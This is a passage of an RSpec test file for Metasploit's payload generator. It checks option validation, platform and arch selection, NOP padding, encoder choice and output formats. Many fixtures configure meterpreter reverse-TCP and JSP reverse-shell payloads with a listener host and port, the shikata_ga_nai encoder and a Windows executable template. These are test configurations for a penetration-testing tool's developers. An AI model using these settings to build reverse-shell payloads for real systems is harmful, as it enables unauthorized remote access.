it { is_expected.to respond_to :format }
it { is_expected.to respond_to :framework }
it { is_expected.to respond_to :iterations }
it { is_expected.to respond_to :keep }
it { is_expected.to respond_to :nops }
it { is_expected.to respond_to :payload }
it { is_expected.to respond_to :platform }
it { is_expected.to respond_to :space }
it { is_expected.to respond_to :stdin }
it { is_expected.to respond_to :template }
context 'when creating a new generator' do
subject(:new_payload_generator) { described_class.new(generator_opts) }
context 'when not given a framework instance' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.to raise_error(KeyError, 'key not found: :framework') }
end
context 'when not given a payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: nil,
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.to raise_error(ArgumentError, "invalid payload: ") }
end
context 'when given an invalid payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'beos/meterpreter/reverse_gopher',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.to raise_error(ArgumentError, "invalid payload: beos/meterpreter/reverse_gopher") }
end
context 'when given a payload through stdin' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'stdin',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.not_to raise_error }
end
context 'when given an invalid format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'foobar',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.to raise_error(Msf::InvalidFormat, "invalid format: foobar") }
end
context 'when given any valid transform format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: ::Msf::Simple::Buffer.transform_formats.sample,
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.not_to raise_error }
end
context 'when given any valid executable format' do
let(:format) { ::Msf::Util::EXE.to_executable_fmt_formats.sample }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: ::Msf::Util::EXE.to_executable_fmt_formats.sample,
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it { expect { new_payload_generator }.not_to raise_error }
end
end
context 'when not given a platform' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: '',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context '#platform_list' do
it 'returns an empty PlatformList' do
expect(payload_generator.platform_list.platforms).to be_empty
end
end
context '#choose_platform' do
it 'chooses the platform list for the module' do
expect(payload_generator.choose_platform(payload_module).platforms).to eq [Msf::Module::Platform::Windows]
end
it 'sets the platform attr to the first platform of the module' do
my_generator = payload_generator
my_generator.choose_platform(payload_module)
expect(my_generator.platform).to eq "Windows"
end
end
end
context 'when given an invalid platform' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'foobar',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context '#platform_list' do
it 'returns an empty PlatformList' do
expect(payload_generator.platform_list.platforms).to be_empty
end
end
context '#choose_platform' do
it 'chooses the platform list for the module' do
expect(payload_generator.choose_platform(payload_module).platforms).to eq [Msf::Module::Platform::Windows]
end
end
end
context 'when given a valid platform' do
context '#platform_list' do
it 'returns a PlatformList containing the Platform class' do
expect(payload_generator.platform_list.platforms.first).to eq Msf::Module::Platform::Windows
end
end
context '#choose_platform' do
context 'when the chosen platform matches the module' do
it 'returns the PlatformList for the selected platform' do
expect(payload_generator.choose_platform(payload_module).platforms).to eq payload_generator.platform_list.platforms
end
end
context 'when the chosen platform and module do not match' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'linux',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns an empty PlatformList' do
expect(payload_generator.choose_platform(payload_module).platforms).to be_empty
end
end
end
end
context '#choose_arch' do
context 'when no arch is selected' do
let(:generator_opts) {
{
add_code: false,
arch: '',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns the first arch of the module' do
expect(payload_generator.choose_arch(payload_module)).to eq "x86"
end
it 'sets the arch to match the module' do
my_generator = payload_generator
my_generator.choose_arch(payload_module)
expect(my_generator.arch).to eq "x86"
end
end
context 'when the arch matches the module' do
it 'returns the selected arch' do
expect(payload_generator.choose_arch(payload_module)).to eq 'x86'
end
end
context 'when the arch does not match the module' do
let(:arch) { "mipsle" }
let(:generator_opts) {
{
add_code: false,
arch: 'mipsle',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it "returns nil" do
expect(payload_generator.choose_arch(payload_module)).to be_nil
end
end
end
context '#generate_raw_payload' do
context 'when passing a payload through stdin' do
context 'when no arch has been selected' do
let(:generator_opts) {
{
add_code: false,
arch: '',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'stdin',
platform: 'Windows',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an IncompatibleArch error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::IncompatibleArch, "You must select an arch for a custom payload")
end
end
context 'when no platform has been selected' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'stdin',
platform: '',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an IncompatiblePlatform error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::IncompatiblePlatform, "You must select a platform for a custom payload")
end
end
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'stdin',
platform: 'Windows',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns the payload from stdin' do
expect(payload_generator.generate_raw_payload).to eq "\x90\x90\x90"
end
end
context 'when selecting a metasploit payload' do
context 'when the platform is incompatible with the payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'linux',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an IncompatiblePlatform error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::IncompatiblePlatform, "The selected platform is incompatible with the payload")
end
end
context 'when the arch is incompatible with the payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'mipsle',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an IncompatibleArch error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::IncompatibleArch, "The selected arch is incompatible with the payload")
end
end
context 'when one or more datastore options are missing' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: {} ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: "\x90\x90\x90",
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'should raise an error' do
expect{payload_generator.generate_raw_payload}.to raise_error(Msf::OptionValidateError)
end
end
it 'returns the raw bytes of the payload' do
expect(payload_generator.generate_raw_payload).to be_present
end
end
end
context '#add_shellcode' do
let(:shellcode) { "\x50\x51\x58\x59" }
context 'when add_code is empty' do
it 'returns the original shellcode' do
expect(payload_generator.add_shellcode(shellcode)).to eq shellcode
end
end
context 'when add_code points to a valid file' do
context 'but platform is not Windows' do
let(:generator_opts) {
{
add_code: File.join(FILE_FIXTURES_PATH, "nop_shellcode.bin"),
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Linux',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns the original shellcode' do
expect(payload_generator.add_shellcode(shellcode)).to eq shellcode
end
end
context 'but arch is not x86' do
let(:generator_opts) {
{
add_code: File.join(FILE_FIXTURES_PATH, "nop_shellcode.bin"),
arch: 'x64',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns the original shellcode' do
expect(payload_generator.add_shellcode(shellcode)).to eq shellcode
end
end
it 'returns modified shellcode' do
skip "This is a bad test and needs to be refactored"
# The exact length is variable due to random nops inserted into the routine
# It looks like it should always be > 300
# Can't do precise output matching due to this same issue
expect(payload_generator.add_shellcode(shellcode).length).to be > 300
end
end
context 'when add_code points to an invalid file' do
let(:generator_opts) {
{
add_code: "gurfjhfdjhfdsjhfsdvfverf444",
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an error' do
expect{payload_generator.add_shellcode(shellcode)}.to raise_error(Errno::ENOENT)
end
end
end
context '#prepend_nops' do
let(:shellcode) { "\x50\x51\x58\x59" }
context 'when nops are set to 0' do
before(:example) do
load_and_create_module(
module_type: 'nop',
reference_name: 'x86/opty2'
)
end
it 'returns the unmodified shellcode' do
expect(payload_generator.prepend_nops(shellcode)).to eq shellcode
end
end
context 'when nops are set to more than 0' do
before(:example) do
load_and_create_module(
module_type: 'nop',
reference_name: 'x86/opty2'
)
end
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: '',
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 20,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context 'when payload is x86' do
it 'returns shellcode of the correct size' do
final = payload_generator.prepend_nops(shellcode)
expect(final.length).to eq 24
end
it 'puts the nops in front of the original shellcode' do
expect(payload_generator.prepend_nops(shellcode)[20,24]).to eq shellcode
end
end
context 'when payload is Windows x64' do
let(:generator_opts) {
{
add_code: false,
arch: 'x64',
badchars: '',
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 20,
payload: 'windows/x64/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
before(:example) do
load_and_create_module(
module_type: 'nop',
reference_name: 'x64/simple'
)
load_and_create_module(
ancestor_reference_names: %w{
stagers/windows/x64/reverse_tcp
stages/windows/x64/meterpreter
},
module_type: 'payload',
reference_name: 'windows/x64/meterpreter/reverse_tcp'
)
end
it 'returns shellcode of the correct size' do
final = payload_generator.prepend_nops(shellcode)
expect(final.length).to eq(20 + shellcode.length)
end
it 'puts the nops in front of the original shellcode' do
final = payload_generator.prepend_nops(shellcode)
expect(final[20, 20 + shellcode.length]).to eq shellcode
end
end
end
end
context '#get_encoders' do
let!(:encoder_module) {
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/shikata_ga_nai'
)
}
let(:encoder_names) { ["Polymorphic XOR Additive Feedback Encoder", "Alpha2 Alphanumeric Mixedcase Encoder" ] }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context 'when an encoder is selected' do
it 'returns an array' do
expect(payload_generator.get_encoders).to be_kind_of Array
end
it 'returns an array with only one element' do
expect(payload_generator.get_encoders.count).to eq 1
end
it 'returns the correct encoder in the array' do
expect(payload_generator.get_encoders.first.name).to eq encoder_names[0]
end
end
context 'when multiple encoders are selected' do
#
# lets
#
# let(:encoder_reference_name) {
# encoder_reference_names.join(',')
# }
#
# let(:encoder_reference_names) {
# %w{
# x86/shikata_ga_nai
# x86/alpha_mixed
# }
# }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai,x86/alpha_mixed',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
before(:example) do
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/alpha_mixed'
)
end
it 'returns an array of the right size' do
expect(payload_generator.get_encoders.count).to eq 2
end
it 'returns each of the selected encoders in the array' do
payload_generator.get_encoders.each do |msf_encoder|
expect(encoder_names).to include msf_encoder.name
end
end
it 'returns the encoders in order of rank high to low' do
expect(payload_generator.get_encoders[0].rank).to be > payload_generator.get_encoders[1].rank
end
end
context 'when no encoder is selected but badchars are present' do
# let(:encoder_reference_name) { '' }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: '',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'returns an array of all encoders with a compatible arch' do
payload_generator.get_encoders.each do |my_encoder|
expect(my_encoder.arch).to include 'x86'
end
end
end
context 'when no encoder or badchars are selected' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: '',
encoder: '',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
let(:encoder_module) {
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/shikata_ga_nai'
)
}
it 'returns an empty array' do
expect(payload_generator.get_encoders).to be_empty
end
end
end
context '#run_encoder' do
let(:shellcode) { "\x50\x51\x58\x59" }
let(:encoder_module) {
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/shikata_ga_nai'
)
}
it 'should call the encoder a number of times equal to the iterations' do
expect(encoder_module).to receive(:encode).exactly(1).times.and_return(shellcode)
payload_generator.run_encoder(encoder_module, shellcode)
end
context 'when the encoder makes a buffer too large' do
# let(:space) { 4 }
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 4,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'should raise an error' do
expect{payload_generator.run_encoder(encoder_module, shellcode)}.to raise_error(Msf::EncoderSpaceViolation, "encoder has made a buffer that is too big")
end
end
end
context '#format_payload' do
let(:shellcode) { "\x50\x51\x58\x59" }
context 'when format is js_be' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'js_be',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context 'and arch is x86' do
it 'should raise an IncompatibleEndianess error' do
expect{payload_generator.format_payload(shellcode)}.to raise_error(Msf::IncompatibleEndianess, "Big endian format selected for a non big endian payload")
end
end
end
context 'when format is a transform format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'c',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'applies the appropriate transform format' do
expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf')
payload_generator.format_payload(shellcode)
end
end
context 'when format is an executable format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'exe',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'applies the appropriate executable format' do
expect(::Msf::Util::EXE).to receive(:to_executable_fmt).with(framework, 'x86', kind_of(payload_generator.platform_list.class), shellcode, 'exe', payload_generator.exe_options)
payload_generator.format_payload(shellcode)
end
end
end
context '#generate_java_payload' do
context 'when format is war' do
context 'if the payload is a valid java payload' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'war',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'java/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
let(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/java/reverse_tcp
stages/java/meterpreter
},
module_type: 'payload',
reference_name: 'java/meterpreter/reverse_tcp'
)
}
it 'calls the generate_war on the payload' do
allow(framework).to receive_message_chain(:payloads, :keys).and_return ['java/meterpreter/reverse_tcp']
allow(framework).to receive_message_chain(:payloads, :create).and_return(payload_module)
expect(payload_module).to receive(:generate_war).and_call_original
payload_generator.generate_java_payload
end
end
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'war',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an InvalidFormat exception' do
expect{ payload_generator.generate_java_payload }.to raise_error(Msf::InvalidFormat)
end
end
context 'when format is raw' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'java/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
context 'if the payload responds to generate_jar' do
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/java/reverse_tcp
stages/java/meterpreter
},
module_type: 'payload',
reference_name: 'java/meterpreter/reverse_tcp'
)
}
it 'calls the generate_jar on the payload' do
allow(framework).to receive_message_chain(:payloads, :keys).and_return ['java/meterpreter/reverse_tcp']
allow(framework).to receive_message_chain(:payloads, :create).and_return(payload_module)
expect(payload_module).to receive(:generate_jar).and_call_original
payload_generator.generate_java_payload
end
end
context 'if the payload does not respond to generate_jar' do
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
singles/java/jsp_shell_reverse_tcp
},
module_type: 'payload',
reference_name: 'java/jsp_shell_reverse_tcp'
)
}
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'java/jsp_shell_reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'calls #generate' do
allow(framework).to receive_message_chain(:payloads, :keys).and_return ['java/jsp_shell_reverse_tcp']
allow(framework).to receive_message_chain(:payloads, :create).and_return(payload_module)
expect(payload_module).to receive(:generate).and_call_original
payload_generator.generate_java_payload
end
end
end
context 'when format is a non-java format' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'exe',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'raises an InvalidFormat exception' do
expect{payload_generator.generate_java_payload}.to raise_error(Msf::InvalidFormat)
end
end
end
context '#generate_payload' do
let!(:encoder_module) {
load_and_create_module(
module_type: 'encoder',
reference_name: 'x86/shikata_ga_nai'
)
}
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'calls each step of the process' do
expect(payload_generator).to receive(:generate_raw_payload).and_call_original
expect(payload_generator).to receive(:add_shellcode).and_call_original
expect(payload_generator).to receive(:encode_payload).and_call_original
expect(payload_generator).to receive(:prepend_nops).and_call_original
expect(payload_generator).to receive(:format_payload).and_call_original
payload_generator.generate_payload
end
context 'when the payload is java' do
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/java/reverse_tcp
stages/java/meterpreter
},
module_type: 'payload',
reference_name: 'java/meterpreter/reverse_tcp'
)
}
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: 'x86/shikata_ga_nai',
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'java/meterpreter/reverse_tcp',
platform: 'Windows',
space: 1073741824,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
it 'calls generate_java_payload' do
expect(payload_generator).to receive(:generate_java_payload).and_call_original
payload_generator.generate_payload
end
end
end
context 'when the payload exceeds the specified space' do
let(:generator_opts) {
{
add_code: false,
arch: 'x86',
badchars: "\x20\x0D\x0A",
encoder: nil,
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'raw',
framework: framework,
iterations: 1,
keep: false,
nops: 0,
payload: 'windows/meterpreter/reverse_tcp',
platform: 'Windows',
space: 100,
stdin: nil,
template: File.join(Msf::Config.data_directory, 'templates', 'template_x86_windows.exe')
}
}
